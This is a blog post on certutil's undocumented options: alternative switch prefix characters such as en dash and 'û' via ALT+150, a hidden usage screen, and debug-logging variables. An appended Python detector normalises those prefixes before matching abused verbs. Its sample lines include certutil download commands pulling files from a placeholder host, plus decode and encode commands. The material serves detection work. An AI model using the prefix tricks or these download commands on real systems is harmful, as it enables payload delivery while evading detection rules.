{"id":7428,"date":"2020-08-30T23:43:33","date_gmt":"2020-08-30T23:43:33","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=7428"},"modified":"2020-08-31T22:35:10","modified_gmt":"2020-08-31T22:35:10","slug":"certulitis-one-tool-that-keeps-on-giving","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2020\/08\/30\/certulitis-one-tool-that-keeps-on-giving\/","title":{"rendered":"Certulitis &#8211; one tool that keeps on giving"},"content":{"rendered":"\n<p><strong>Update<\/strong><\/p>\n\n\n\n<p>EC, who is one of the most technical guys I know, pinged me because he figured out the meaning of that 0x00FB switch. The idea behind it is Windows archaeology at its best and it goes as follows:<\/p>\n\n\n\n<p>The code page your Windows console uses (by default, on a US-English system) is 437, the OEM code page. The en dash (&#8216;\u2013&#8217;) is character 150 (0x96) in the Windows-1252 ANSI code page. When that byte is entered on a console using code page 437 it is interpreted as &#8216;\u00fb&#8217;, which is code 0xFB (Unicode U+00FB), the mysterious switch character.<\/p>\n\n\n\n<p>How to use it with certutil?<\/p>\n\n\n\n<p>You can run (ALT+150 is typed on the numeric keypad):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil ALT+150&lt;command of your choice><\/pre>\n\n\n\n<p><strong>Old Post<\/strong><\/p>\n\n\n\n<p>Certutil is a really <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/23\/certutil-one-more-gui-lolbin\/\">naughty<\/a> tool. It accepts a lot of command line arguments that I believe are not widely known, and this post (and maybe some follow-up posts) hopes to change that.<\/p>\n\n\n\n<p>One of the first things I caught when I started analysing its command line arguments was a mysterious, case-insensitive comparison of the argument with the &#8216;uSAGE&#8217; string. It turns out that certutil offers two different usage screens depending on the command line option: if you just use &#8216;?&#8217;, you get the &#8216;official&#8217; version; if you use &#8216;uSAGE&#8217;, you get the unofficial one. 
Of course, once I found out, I ran to Google and Twitter to find out whether it was already known. <\/p>\n\n\n\n<p>Yes, it was. <a href=\"https:\/\/twitter.com\/0gtweet\">@0gtweet<\/a> did it my favourite way &#8211; the <a href=\"https:\/\/twitter.com\/0gtweet\/status\/1236960061873967104?s=20\">hard way<\/a> :-), <a href=\"https:\/\/twitter.com\/dunarth\/status\/1237151141634293760?s=20\">@dunarth<\/a> did it the right way, and <a href=\"https:\/\/twitter.com\/chris_ayres\">@chris_ayres<\/a> did it the <a href=\"https:\/\/twitter.com\/chris_ayres\/status\/1045032036971556864?s=20\">earliest<\/a> way (AFAICT).<\/p>\n\n\n\n<p>Okay, with this out of the way, let&#8217;s look at the actual command line arguments.<\/p>\n\n\n\n<p>Wait. What about the switch characters? Similarly to PowerShell, certutil accepts several different characters as the switch prefix:<\/p>\n\n\n\n<ul><li>\/ (Unicode 0x002F, slash)<\/li><li>- (Unicode 0x002D, hyphen-minus)<\/li><li><strong>\u2013<\/strong> (Unicode 0x2013, en dash)<\/li><li><strong>\u2212<\/strong> (Unicode 0x2212, minus sign)<\/li><li><strong>\u00fb<\/strong> (Unicode 0x00FB, u with circumflex)<\/li><\/ul>\n\n\n\n<p>I still can&#8217;t figure out why the last character on that list is being accepted. The Unicode character 0x00FB is &#8216;\u00fb&#8217;. If you know, please let me know and I will update the post (see the Update at the top: it has since been explained).<\/p>\n\n\n\n<p>From a detection point of view this matters: a rule that looks for &#8216;-urlcache&#8217; or &#8216;\/decode&#8217; literally will miss the same command written with an en dash, a minus sign or &#8216;\u00fb&#8217; as the prefix, so normalise the prefix character before matching switch names.<\/p>\n\n\n\n<p>Another discovery is brought to us by a handful of unusual environment variables:<\/p>\n\n\n\n<ul><li>certsrv_rawhex &#8211; dumps data (e.g. certs) as raw hex<\/li><li>CertSrv_Chain &#8211; makes debugging information available for certificate chain building<\/li><li>CERTSRV_LOGMAX &#8211; maximum length of the certutil.log file<\/li><li>CERTSRV_DEBUG &#8211; enables certutil debug mode (see the value used below)<\/li><li>CERTSRV_LOGFILE &#8211; name of the log file<\/li><\/ul>\n\n\n\n<p>The &#8216;certutil.log&#8217; file is created if the DbgIsSSActive function (imported from &#8216;certcli.dll&#8217;, which forwards it to &#8216;certca.dll&#8217;) returns true. 
I am kidding; it&#8217;s a convoluted way of saying that certain conditions need to be met for &#8216;certutil.log&#8217; to be created. They can be set either via the Registry (HKLM\\Software\\Microsoft\\Cryptography\\AutoEnrollment\\Debug=XXX or HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\Debug=XXX) or via the environment variables listed above.<\/p>\n\n\n\n<p>In fact, setting<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">set CERTSRV_LOGFILE=c:\\test\\foo.log<br>set CERTSRV_DEBUG=0xFFFFFFFF<\/pre>\n\n\n\n<p>will enable full logging both to your console and to the file c:\\test\\foo.log.<\/p>\n\n\n\n<p>Pick your favourite certutil command and give it a go. You will like the output, as it helps to troubleshoot your manual testing \ud83d\ude42<\/p>\n\n\n\n<p>Finally, while certutil is primarily a command line application, it does create a window called &#8216;CertUtil Application&#8217; of class &#8216;CertUtil&#8217; and, apart from that, provides a UI for some of its commands (e.g. <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/23\/certutil-one-more-gui-lolbin\/\">-URL<\/a>).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Update EC, who is one of the most technical guys I know, pinged me because he figured out the meaning of that 0x00FB switch. The idea behind it is Windows archaeology at its best and it goes as follows: The &hellip; <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/30\/certulitis-one-tool-that-keeps-on-giving\/\">Continue reading <span 
class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[53,67],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=7428"}],"version-history":[{"count":7,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428\/revisions"}],"predecessor-version":[{"id":7437,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428\/revisions\/7437"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=7428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=7428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=7428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
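Added example (not code from the original post or from certutil itself): it reproduces the code page mapping behind the 0x00FB switch described in the Update (en dash is 0x96 in Windows-1252; byte 0x96 on a CP437 console is û), and it shows a prefix-agnostic normaliser for the five switch characters the post lists, so a detection keyed on a switch name is not bypassed by writing it with an en dash, a minus sign or û instead of '-'. The sample command lines are constructed, the watchlist of verbs (urlcache, decode, encode) is a small illustrative set chosen for this example, and the tokenizer is a deliberately minimal approximation of Windows command line splitting.

```python
"""Added example (not from the original post): the CP437/CP1252 mapping behind
the 0x00FB switch, and a normaliser that treats all five certutil switch
prefixes as equivalent before matching switch names.

Assumptions: the prefix set is the one listed in the post; SUSPICIOUS_VERBS is
an illustrative watchlist; SAMPLE_CMDLINES are constructed, not real telemetry.
"""
import re
from typing import List, Optional, Set

# Switch prefix characters the post reports certutil accepting:
# '/', '-', en dash (U+2013), minus sign (U+2212), u with circumflex (U+00FB).
SWITCH_PREFIXES = frozenset("/-\u2013\u2212\u00fb")

# Illustrative watchlist of certutil verbs commonly abused for download/decode.
SUSPICIOUS_VERBS = frozenset({"urlcache", "decode", "encode"})


def console_char_for_alt_code(alt_code: int, console_cp: str = "cp437") -> str:
    """Character produced by typing ALT+<alt_code> on a console using console_cp.

    ALT+<decimal> enters the byte with that value; the console interprets it
    with its OEM code page, 437 on a US-English system. ALT+150 therefore
    yields bytes([150]).decode('cp437'), which is U+00FB.
    """
    return bytes([alt_code]).decode(console_cp)


def ansi_byte_for(char: str, ansi_cp: str = "cp1252") -> int:
    """Single-byte value of `char` in the given ANSI code page.

    The en dash is 0x96 in Windows-1252, which is why ALT+150 is the way to
    reach the 0x00FB prefix from a CP437 console.
    """
    encoded = char.encode(ansi_cp)
    if len(encoded) != 1:
        raise ValueError(f"{char!r} is not a single byte in {ansi_cp}")
    return encoded[0]


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Minimal tokenizer: whitespace-separated, double-quoted runs kept together."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def normalize_switch(token: str) -> Optional[str]:
    """Return the lower-cased switch name if `token` begins with an accepted
    prefix, otherwise None. '-urlcache', '/URLCache', '\u2013urlcache' and
    '\u00fburlcache' all normalise to 'urlcache'."""
    if len(token) >= 2 and token[0] in SWITCH_PREFIXES:
        return token[1:].lower()
    return None


def certutil_switches(cmdline: str) -> List[str]:
    """All switch names on a certutil command line, in order, prefix-agnostic."""
    tokens = split_windows_cmdline(cmdline)
    return [s for s in map(normalize_switch, tokens[1:]) if s is not None]


def flag_certutil(cmdline: str) -> Set[str]:
    """Watchlisted verbs present on the command line, regardless of prefix char."""
    return set(SUSPICIOUS_VERBS.intersection(certutil_switches(cmdline)))


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe",
    "certutil \u2013decode payload.b64 payload.exe",     # en dash prefix
    "certutil \u00fbencode secret.docx out.b64",          # ALT+150 on a CP437 console
    "certutil \u2212dump cert.cer",                       # minus sign, benign verb
    '"C:\\Windows\\System32\\certutil.exe" /URLCache /f http://example.invalid/b b',
]


def main() -> None:
    # The Windows archaeology from the Update, reproduced with Python's codecs.
    assert console_char_for_alt_code(150) == "\u00fb"
    assert ansi_byte_for("\u2013") == 0x96
    for line in SAMPLE_CMDLINES:
        hits = sorted(flag_certutil(line))
        print(f"{hits or '-'}  {line}")


if __name__ == "__main__":
    main()
```

Running the block prints the flagged verbs for each constructed line; the en dash, û and /URLCache variants are caught the same way as the plain '-urlcache' form, and the benign '−dump' line is not flagged. The tokenizer does not model every rule of Windows argument parsing (escaped quotes, for instance), so treat it as the shape of the check rather than a drop-in parser.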